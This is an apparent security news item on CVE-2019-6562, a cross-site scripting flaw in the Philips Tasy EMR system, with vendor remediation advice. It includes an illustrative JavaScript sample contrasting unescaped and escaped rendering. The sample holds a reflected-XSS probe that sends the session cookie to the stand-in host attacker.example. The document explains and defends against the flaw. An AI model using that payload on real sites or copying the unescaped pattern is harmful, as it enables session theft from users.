A vulnerability has been discovered in the Philips Tasy EMR information system. An attacker who exploits it could send unexpected data to the system, which could potentially allow arbitrary code to be executed, alter the flow of information, affect system integrity, and give the attacker unauthorized access to patient data.
Security researcher Rafael Honorato discovered the vulnerability and reported it to Philips. Philips then notified the National Cybersecurity and Communications Integration Center (NCCIC) about the vulnerability, and ICS-CERT issued an advisory on April 30, 2019.
The vulnerability, tracked as CVE-2019-6562, affects Tasy EMR versions 3.02.174 and earlier. The affected installations are mainly at healthcare organizations in Mexico and Brazil. To date, there are no reports of the vulnerability being exploited in the wild, and no public exploit is known.
The flaw is a cross-site scripting (XSS) vulnerability caused by improper neutralization of user-controllable input when the application generates a web page. An attacker with a low skill level could exploit it through the customer-facing web page or over a VPN connection. Despite the potential for information exposure, the vulnerability has been assigned a CVSS v3 base score of only 4.1 out of 10.
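To make the weakness class concrete, the following is an added illustration and not Philips or Tasy EMR code: it shows how a page-rendering routine that concatenates user-controllable input into HTML lets an attacker inject markup, and how encoding the input before insertion neutralizes it. The "patient search" page, its parameter name and the probe string are all hypothetical.

```javascript
// Added example (not Philips/Tasy code): improper neutralization of
// user-controllable input during page generation (CWE-79), side by side
// with the corrected output encoding. The search page is hypothetical.

// Vulnerable: the user-supplied query is concatenated straight into HTML,
// so any markup it contains is parsed by the browser as part of the page.
function renderSearchPageVulnerable(query) {
  return `<h1>Results for: ${query}</h1>`;
}

// Minimal HTML entity encoder for text placed in element content or in a
// double-quoted attribute value. Each character that can change the HTML
// parser's state is replaced by its entity, so the input can never close
// the surrounding element or open a new one.
function escapeHtml(value) {
  const entities = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
  };
  return String(value).replace(/[&<>"']/g, (c) => entities[c]);
}

// Hardened: the same template, but the input is encoded before insertion.
function renderSearchPageSafe(query) {
  return `<h1>Results for: ${escapeHtml(query)}</h1>`;
}

// Crude check used only to show the difference between the two renderers:
// does the generated page contain a <script> tag that the template itself
// never emitted?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample input: a classic reflected-XSS probe that would
// exfiltrate the session cookie to an attacker-controlled host.
const PROBE =
  '<script>document.location="https://attacker.example/?c="+document.cookie</script>';

function demo() {
  const vulnerable = renderSearchPageVulnerable(PROBE);
  const safe = renderSearchPageSafe(PROBE);
  return {
    vulnerableHasScript: containsScriptTag(vulnerable), // true
    safeHasScript: containsScriptTag(safe),             // false
    safeOutput: safe,
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

The encoder above is only correct for element content and quoted attribute values; input that lands inside a script block, a URL, or an unquoted attribute needs a context-specific encoder, which is why frameworks with auto-escaping templates are preferable to hand-rolled string building.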
Philips has advised all Tasy EMR users to upgrade without delay to one of the three most recent releases and to apply Service Packs promptly. Philips will patch hosted deployments automatically, and will notify users with on-premise installations of Tasy EMR when the fixed software versions are released.
Philips also advises following the instructions in the product configuration manual and ensuring that Tasy EMR is reachable over the web only through a VPN.